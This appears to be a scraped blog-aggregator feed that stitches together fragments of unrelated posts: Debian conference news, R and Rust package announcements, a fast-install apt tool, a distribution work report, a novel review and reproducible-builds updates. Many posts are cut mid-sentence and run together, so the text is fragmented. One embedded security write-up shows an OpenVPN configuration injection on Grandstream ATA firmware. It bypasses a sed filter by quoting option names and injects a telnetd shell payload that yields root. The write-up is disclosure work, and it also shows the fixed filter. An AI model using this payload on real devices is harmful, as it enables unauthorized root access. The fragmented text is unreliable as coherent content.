Jonathan Dowland: printables.com feed

- trending - https://dyn.tedder.me/rss/printables/trending.json
- top rated - https://dyn.tedder.me/rss/printables/top_rated.json
- top downloads - https://dyn.tedder.me/rss/printables/top_downloads.json
The idea for this logo came from the city's landscape, the place where the medieval tower looks over the river that meets the sea, almost like guarding it. The Debian red swirl comes out of the blue water splash as a continuous stroke, and they are also the French flag colours. I tried to combine elements from the city when I was sketching in the notebook, which is an important step for me as I feel that ideas flow much more easily, but the swirl + water with the tower was the most refreshing combination, so I jumped to the computer to design it properly. The water bit was the most difficult element, and I used the Debian swirl as a base for it, so both would look consistent. The city name font is a modern calligraphy style and the overall composition is not symmetric but balanced with the different elements. I am glad that the Debian community felt represented with this logo idea!Congratulations, Juliana, and thank you very much for your contribution to Debian! The DebConf25 Team would like to take this opportunity to remind you that DebConf, the annual international Debian Developers Conference, needs your help. If you want to help with the DebConf 25 organization, don't hesitate to reach out to us via the #debconf-team channel on OFTC. Furthermore, we are always looking for sponsors. DebConf is run on a non-profit basis, and all financial contributions allow us to bring together a large number of contributors from all over the globe to work collectively on Debian. Detailed information about the sponsorship opportunities is available on the DebConf 25 website. See you in Brest!
> RcppUUID::uuid_generate_time(5)
[1] "0194d8fa-7add-735c-805b-6bbf22b78b9e" "0194d8fa-7add-735e-8012-3e0e53895b19"
[3] "0194d8fa-7add-735e-81af-bc67bb435ade" "0194d8fa-7add-735e-82b1-405bf57963ad"
[5] "0194d8fa-7add-735f-801e-efe57078b2e7"
>
clock
object, I am not aware of a text parser so there is currently no inverse
function (as ulid
offers) for the character
representation.
The NEWS entry for the two releases follows.
Courtesy of my CRANberries, there is also a diffstat report. More detailed information is on the RcppUUID page, or the github repo.Changes in version 1.2.0 (2025-02-12)
- Time-based UUIDs, ie version 7, can now be generated (requiring Boost 1.86 or newer as in the current BH package)
Changes in version 1.1.2 (2025-01-31)
- New maintainer to resurrect package on CRAN
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.
/etc/rc.d/init.d/openvpn
did
echo "$(nvram get 8460)" sed 's/;/\n/g' >> $ CONF_FILE
echo "$(nvram get 8460)" sed -e 's/;/\n/g' sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> $ CONF_FILE
script-security
or start with a set of options that allow command execution.
Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf
), it already uses up
and therefor sets script-security 2
, so injecting that is unnecessary.
Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
in one of the command-executing options, a reverse shell will be opened.
The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up
, down
, etc), followed by another space.
While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab neither via the web interface, nor via SSH/gs_config
.
However, OpenVPN also allows quoting, which is only documented for parameters, but works just well for option names too.
That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
/etc/rc.d/init.d/openvpn
won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up script-security)' /etc/openvpn.conf up /etc/openvpn/openvpn.up up-restart ;group nobody script-security 2 "up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
/ # uname -a Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux / # id uid=0(root) gid=0(root)
/etc/rc.d/init.d/openvpn
looks very similar, according to firmware dumpsecho "$(nvram get 8460)" sed -e 's/;/\n/g' \ sed -e '/script-security/d' \ -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \ -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> $ CONF_FILE
macro_rules
; and its convenience and simplicity, compared to proc macros.
Programmers coming to Rust from scripting languages will appreciate derive-deftly s convenient automatic code generation, which works as a kind of compile-time introspection.
Rust s two main macro systems
I m often a fan of metaprogramming, including macros. They can help remove duplication and flab, which are often the enemy of correctness.
Rust has two macro systems. derive-deftly offers much of the power of the more advanced (proc_macros), while beating the simpler one (macro_rules) at its own game for ease of use.
(Side note: Rust has at least three other ways to do metaprogramming: generics; build.rs
; and, multiple module inclusion via #[path=]
. These are beyond the scope of this blog post.)
macro_rules!
macro_rules!
aka pattern macros , declarative macros , or sometimes macros by example are the simpler kind of Rust macro.
They involve writing a sort-of-BNF pattern-matcher, and a template which is then expanded with substitutions from the actual input. If your macro wants to accept comma-separated lists, or other simple kinds of input, this is OK. But often we want to emulate a #[derive(...)]
macro: e.g., to define code based on a struct, handling each field. Doing that with macro_rules is very awkward:
macro_rules!
s pattern language doesn t have a cooked way to match a data structure, so you have to hand-write a matcher for Rust syntax, in each macro. Writing such a matcher is very hard in the general case, because macro_rules
lacks features for matching important parts of Rust syntax (notably, generics). (If you really need to, there s a horrible technique as a workaround.)
And, the invocation syntax for the macro is awkward: you must enclose the whole of the struct in my_macro!
. This makes it hard to apply more than one macro to the same struct, and produces rightward drift.
Enclosing the struct this way means the macro must reproduce its input - so it can have bugs where it mangles the input, perhaps subtly. This also means the reader cannot be sure precisely whether the macro modifies the struct itself. In Rust, the types and data structures are often the key places to go to understand a program, so this is a significant downside.
macro_rules
also has various other weird deficiencies too specific to list here.
Overall, compared to (say) the C preprocessor, it s great, but programmers used to the power of Lisp macros, or (say) metaprogramming in Tcl, will quickly become frustrated.
proc macros
Rust s second macro system is much more advanced. It is a fully general system for processing and rewriting code. The macro s implementation is Rust code, which takes the macro s input as arguments, in the form of Rust tokens, and returns Rust tokens to be inserted into the actual program.
This approach is more similar to Common Lisp s macros than to most other programming languages macros systems. It is extremely powerful, and is used to implement many very widely used and powerful facilities. In particular, proc macros can be applied to data structures with #[derive(...)]
. The macro receives the data structure, in the form of Rust tokens, and returns the code for the new implementations, functions etc.
This is used very heavily in the standard library for basic features like #[derive(Debug)]
and Clone
, and for important libraries like serde
and strum
.
But, it is a complete pain in the backside to write and maintain a proc_macro.
The Rust types and functions you deal with in your macro are very low level. You must manually handle every possible case, with runtime conditions and pattern-matching. Error handling and recovery is so nontrivial there are macro-writing libraries and even more macros to help. Unlike a Lisp codewalker, a Rust proc macro must deal with Rust s highly complex syntax. You will probably end up dealing with syn, which is a complete Rust parsing library, separate from the compiler; syn is capable and comprehensive, but a proc macro must still contain a lot of often-intricate code.
There are build/execution environment problems. The proc_macro code can t live with your application; you have to put the proc macros in a separate cargo package, complicating your build arrangements. The proc macro package environment is weird: you can t test it separately, without jumping through hoops. Debugging can be awkward. Proper tests can only realistically be done with the help of complex additional tools, and will involve a pinned version of Nightly Rust.
derive-deftly to the rescue
derive-deftly lets you use a write a #[derive(...)]
macro, driven by a data structure, without wading into any of that stuff.
Your macro definition is a template in a simple syntax, with predefined $
-substitutions for the various parts of the input data structure.
Example
Here s a real-world example from a personal project:
define_derive_deftly!
export UpdateWorkerReport:
impl $ttype
pub fn update_worker_report(&self, wr: &mut WorkerReport)
$(
$ when fmeta(worker_report)
wr.$fname = Some(self.$fname.clone()).into();
)
#[derive(Debug, Deftly, Clone)]
...
#[derive_deftly(UiMap, UpdateWorkerReport)]
pub struct JobRow
...
#[deftly(worker_report)]
pub status: JobStatus,
pub processing: NoneIsEmpty<ProcessingInfo>,
#[deftly(worker_report)]
pub info: String,
pub duplicate_of: Option<JobId>,
This is a nice example, also, of how using a macro can avoid bugs. Implementing this update by hand without a macro would involve a lot of cut-and-paste. When doing that cut-and-paste it can be very easy to accidentally write bugs where you forget to update some parts of each of the copies:
pub fn update_worker_report(&self, wr: &mut WorkerReport)
wr.status = Some(self.status.clone()).into();
wr.info = Some(self.status.clone()).into();
Spot the mistake? We copy status
to info
. Bugs like this are extremely common, and not always found by the type system. derive-deftly can make it much easier to make them impossible.
Special-purpose derive macros are now worthwhile!
Because of the difficult and cumbersome nature of proc macros, very few projects have site-specific, special-purpose #[derive(...)]
macros.
The Arti codebase has no bespoke proc macros, across its 240kloc and 86 crates. (We did fork one upstream proc macro package to add a feature we needed.) I have only one bespoke, case-specific, proc macro amongst all of my personal Rust projects; it predates derive-deftly.
Since we have started using derive-deftly in Arti, it has become an important tool in our toolbox. We have 37 bespoke derive macros, done with derive-deftly. Of these, 9 are exported for use by downstream crates. (For comparison there are 176 macro_rules macros.)
In my most recent personal Rust project, I have 22 bespoke derive macros, done with with derive-deftly, and 19 macro_rules macros.
derive-deftly macros are easy and straightforward enough that they can be used as readily as macro_rules macros. Indeed, they are often clearer than a macro_rules macro.
Stability without stagnation
derive-deftly is already highly capable, and can solve many advanced problems.
It is mature software, well tested, with excellent documentation, comprising both comprehensive reference material and the walkthrough-structured user guide.
But declaring it 1.0 doesn t mean that it won t improve further.
Our ticket tracker has a laundry list of possible features. We ll sometimes be cautious about committing to these, so we ve added a beta
feature flag, for opting in to less-stable features, so that we can prototype things without painting ourselves into a corner. And, we intend to further develop the Guide.apt
to finish installing packages? Wish there were a way to make your installations blazingly fast without caring about minor things like, oh, data integrity? Well, today is your lucky day! apt-eatmydata
, now available for Debian and all supported Ubuntu releases!
libeatmydata
, you know it s a nifty little hack that disables fsync()
and friends, making package installations way faster by skipping unnecessary disk writes. Normally, you d have to remember to wrap apt
commands manually, like this:
eatmydata apt install texlive-fullBut who has time for that?
apt-eatmydata
takes care of this automagically by integrating eatmydata
seamlessly into apt
itself! That means every package install is now turbocharged no extra typing required. sudo apt install apt-eatmydata
apt-eatmydata
to all supported Ubuntu releases. Just add this PPA and install:
sudo add-apt-repository ppa:firebuild/apt-eatmydataAnd boom! Your
sudo apt install apt-eatmydata
apt install
times are getting serious upgrade. Let s run some tests
# pre-download package to measure only the installation
$ sudo apt install -d linux-headers-6.8.0-53-lowlatency
...
# installation time is 9.35s without apt-eatmydata:
$ sudo time apt install linux-headers-6.8.0-53-lowlatency
...
2.30user 2.12system 0:09.35elapsed 47%CPU (0avgtext+0avgdata 174680maxresident)k
32inputs+1495216outputs (0major+196945minor)pagefaults 0swaps
$ sudo apt install apt-eatmydata
...
$ sudo apt purge linux-headers-6.8.0-53-lowlatency
# installation time is 3.17s with apt-eatmydata:
$ sudo time eatmydata apt install linux-headers-6.8.0-53-lowlatency
2.30user 0.88system 0:03.17elapsed 100%CPU (0avgtext+0avgdata 174692maxresident)k
0inputs+205664outputs (0major+198099minor)pagefaults 0swaps
apt-eatmydata
just made installing Linux headers 3x faster!
apt-eatmydata
does, just setting it up in less than a second! Check it out here:apt-eatmydata
is not for all production environments. If your system crashes mid-install, you might end up with a broken package database. But for throwaway VMs, containers, and CI pipelines? It s an absolute game-changer. I use it on my laptop, too.
So go forth and install recklessly fast! qtpaths6
for cross compilation, by Helmut Grohne
While Qt5 used to use qmake
to query installation properties, Qt6 is moving
more and more to CMake and to ease that transition it relies on more qtpaths
.
Since this tool is not naturally aware of the architecture it is called for, it
tends to produce results for the build architecture. Therefore, more than 100
packages were picking up a multiarch directory for the build architecture during
cross builds. In collaboration with the Qt/KDE team and Sandro Knau in
particular (none affiliated with Freexian), we added an architecture-specific
wrapper script in the same way qmake
has one for Qt5 and Qt6 already. The
relevant CMake module has been updated to prefer the triplet-prefixed wrapper.
As a result, most of the KDE packages now cross build on unstable ready in time
for the trixie
release.
/usr
-move, by Helmut Grohne
In December, Emil S dergren reported that a live-build
was not working for him
and in January, Colin Watson reported that the proposed mitigation for
debian-installer-utils
would practically fail. Both failures were to be
attributed to a wrong understanding of implementation-defined behavior in
dpkg-divert. As a
result, all M18 mitigations had to be reviewed and many of them replaced. Many
have been uploaded already and all instances have received updated patches.
Even though dumat has been in
operation for more than a year, it gained recent changes. For one thing,
analysis of architectures other than amd64
was requested. Chris Hofstaedler
(not affiliated with Freexian) kindly provided computing resources for
repeatedly running it on the larger set. Doing so revealed various
cross-architecture undeclared file conflicts in gcc
, glibc
, and
binutils-z80
, but it also revealed a previously unknown /usr
-move issue in
rpi.rpi-common
. On top of that, dumat
produced false positive diagnostics
and wrongly associated Debian bugs in some cases, both of which have now been
fixed. As a result, a supposedly fixed python3-sepolicy
issue had to be
reopened.
binutils
cross toolchain would result in a binutils-for-host
package that
would not be practically installable as it would depend on a binutils-common
package that was not built. This turned into an examination of binutils-common
and noticing that it actually differed across architectures even though it
should not. Johannes Schauer Marin Rodrigues (not affiliated with Freexian) and
Colin Watson kindly helped brainstorm possible solutions. Eventually, Helmut
provided a patch to move gprofng bits out of
binutils-common. Independently, Matthias Klose
(not affiliated with Freexian) split out binutils-gold
into a separate source
package. As a result, binutils-common
is now equal across architectures and
can be marked Multi-Arch: foreign
resolving the initial problem.
build
image was merged, making it easier to
test !569
with external projects. Santiago used a fork of the debusine repo to try the
draft !569,
and some issues were spotted, and part of them fixed. This is the last debusine
pipeline run with the current
!569:
https://salsa.debian.org/santiago/debusine/-/pipelines/794233.
One of the last improvements relates to how to enable projects to customize the
pipeline, in an equivalent way than they currently do in the extract-source
and build
jobs. While this is work-in-progress, the results are rather
promising. Next steps include deciding on introducing schroot support for
bookworm, bookworm-security, and older releases, as they are done in the
official debian buildd.
python3-tk
package.re2
package, allowing for the use
of the Google RE2 regular expression library as a direct replacement for the
standard library re module.python-ring-doorbell
and
python-asyncclick
.po-debconf
translations to Catalan: reviewed 44 packages and
submitted translations to 90 packages (via salsa merge requests or bugtracker
bugs).po-debconf-manager
with small fixes.zim
a nice desktop wiki that is very handy to organize
your day-to-day digital life to the latest upstream version (0.76).libtool
, opensysusers
and virtualbox
.brlaser
.telepathy-glib
, xorg
, xserver-xorg-video-vesa
, apitrace
, mesa
).Series: | Finder Chronicles #3 |
Publisher: | DAW |
Copyright: | 2021 |
ISBN: | 0-7564-1516-0 |
Format: | Kindle |
Pages: | 458 |
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS. "Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?" "Oh, no, I am not missing this," Isla said, and got out of the podcar. "I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened." "And then?" "And then the bad things on the other side, who we were trying to lock away, will be free to travel through."Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun. The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments. We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well. There are also more sentient ships, and I am so in favor of more sentient ships.
"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into. There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts. Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly. This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended. Followed by Ghostdrift. Rating: 9 out of 10
Participants were offered token compensation for their participation.Seems like Dimensional Research, the company who did that survey, screwed up badly.
Courtesy of my CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the Rcpp R-Forge page.Changes in RcppArmadillo version 14.2.3-1 (2025-02-05)
- Upgraded to Armadillo release 14.2.3 (Smooth Caffeine)
- Minor fix for declaration of
xSYCON
andxHECON
functions in LAPACK- Fix for rare corner-case in
reshape()
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.
/etc
directory is not part of the root filesystem itself. Instead, it s a writable overlay and all modifications are actually stored under /var
(together with all the usual contents that go in that filesystem such as logs, cached data, etc).
/etc
contains important data that is specific to that particular machine like the configuration of known network connections, the password of the main user and the SSH keys. This configuration needs to be kept after an OS update so the system can keep working as expected. However the update process also needs to make sure that other changes to /etc
don t conflict with whatever is available in the new version of the OS, and there have been issues due to some modifications unexpectedly persisting after a system update.
SteamOS 3.6 introduced a new mechanism to decide what to to keep after an OS update, and the system now keeps a list of configuration files that are allowed to be kept in the new version. The idea is that only the modifications that are known to be important for the correct operation of the system are applied, and everything else is discarded1.
However, many users want to be able to keep additional configuration files after an OS update, either because the changes are important for them or because those files are needed for some third-party tool that they have installed. Fortunately the system provides a way to do that, and users (or developers of third-party tools) can add a configuration file to /etc/atomic-update.conf.d
, listing the additional files that need to be kept.
There is an example in /etc/atomic-update.conf.d/example-additional-keep-list.conf
that shows what this configuration looks like.
arm64
armhf
and riscv64
.
[We] identified that with relatively straightforward infrastructure configuration and patching of build tools, we can achieve very high rates of reproducible builds in all studied ecosystems. We conclude that if the ecosystems adopt our suggestions, the build process of published packages can be independently confirmed for nearly all packages without individual developer actions, and doing so will prevent significant future software supply chain attacks.The entire PDF is available online to view.
In this work, we perform the first large-scale study of bitwise reproducibility, in the context of the Nix functional package manager, rebuilding 709,816 packages from historical snapshots of the nixpkgs
repository[. We] obtain very high bitwise reproducibility rates, between 69 and 91% with an upward trend, and even higher rebuildability rates, over 99%. We investigate unreproducibility causes, showing that about 15% of failures are due to embedded build dates. We release a novel dataset with all build statuses, logs, as well as full diffoscopes: recursive diffs of where unreproducible build artifacts differ.
As above, the entire PDF of the article is available to view online.
SOURCE_DATE_EPOCH
environment variable and testing that generated a number of replies.
ext4
filesystem images reproducible. Adithya s issue is that even the smallest amount of post-processing of the filesystem results in the modification of the Last mount and Last write timestamps.
FUSE (Filesystem in USErspace) filesystems such as disorderfs do not delete files from the underlying filesystem when they are deleted from the overlay. This can cause seemingly straightforward tests for example, cases that expect directory contents to be empty after deletion is requested for all files listed within them to fail.
Komikku
(nocheck)abseil-cpp
(race)dunst
(date)eclipse-egit
(jar-mtime minor)exaile
(race)gawk
(bug)gimp3
(png date)intel
(ASLR)ioquake3
(debugsource
contains date and time)joker
(sort)libchardet
llama.cpp
(random)llama.cpp
(-march=native
-related issue)nethack
(race)netrek-client-cow
(date)nvidia-modprobe
(date)nvidia-persistenced
(date)obs-build
(toolchain bug, mis-parses changelog)perl-libconfigfile
(race)pgvector
(CPU)python-Django4
(FTBFS-2038)python-python-datamatrix
(FTBFS)qore-ssh2-module
(GIGO-bug)rpm
(UID in cpio
header from rpmbuild
)zig
(CPU-related issue)uki-tool
(toolchain)cargo-packaging/rusty_v8
(upstream toolchain bugfix)285
, 286
and 287
to Debian:
--css
command-line argument to prevent a potential Cross-site scripting (XSS) attack. Thanks to Daniel Schmidt from SRLabs for the report. [ ]pyexpat
. [ ]specialize( )
before we ve checked that the files are identical or not. [ ]cbfstool
extraction failed.. [ ]surrogateescape
mechanism to avoid a UnicodeDecodeError
and crash when any decoding zipinfo
output that is not UTF-8 compliant. [ ]iso9600.py
. [ ]Config().force_details
; no need for an additional variable in this particular method. [ ]Difference.check_for_ordering_differences
method. [ ].tar
-like archive format. [ ][ ][ ][ ] and lastly, Vagrant Cascadian updated diffoscope in GNU Guix to version 285 [ ][ ] and 286 [ ][ ].
1.14.1-1
was uploaded to Debian unstable by Chris Lamb, making the following the changes:
--verbose
and non --verbose
output of bin/strip-nondeterminism
so we don t imply we are normalizing files that we are not. [ ]SOURCE_DATE_EPOCH
documentation. [ ]README
to make the setup command copy & paste friendly. [ ]armhf
architecture. [ ][ ]arm64
architecture. [ ][ ][ ][ ]riscv64
architecture. [ ][ ]i386
builder to the osuosl5
node. [ ][ ][ ][ ]amd64
worker to the osuosl4
and node. [ ]debrebuild
script under nice
. [ ]TMPDIR
when calling debrebuild
. [ ][ ]#reproducible-builds
on irc.oftc.net
.
rb-general@lists.reproducible-builds.org
k8s-scheduled-volume-snapshotter
to limit the number of snaphots done in a single cron run (see add maxSnapshotCount parameter pull request).
In prod, we used the modified snapshotter to trigger snapshots one by one.
Even with all previous snapshots cleaned up, we could not trigger a single new snapshot without being throttleduseDataPlaneAPI
parameter in the CSI file driver. That was it! useDataPlaneAPI: "true"
in our VolumeSnapshotClass
manifest was the right solution. This indeed solved the throttling issue in our prod cluster. az
command. I indeed has a lot of snaphots, a lot of them dated Jan 19 and 20. There was often a new bogus snaphot created every minute.
These were created during the first attempt at fixing the throttling issue. I guess that even though CSI file driver was throttled, a snaphot was still created in the storage account, but the CSI driver did not see it and retried a minute laterNext.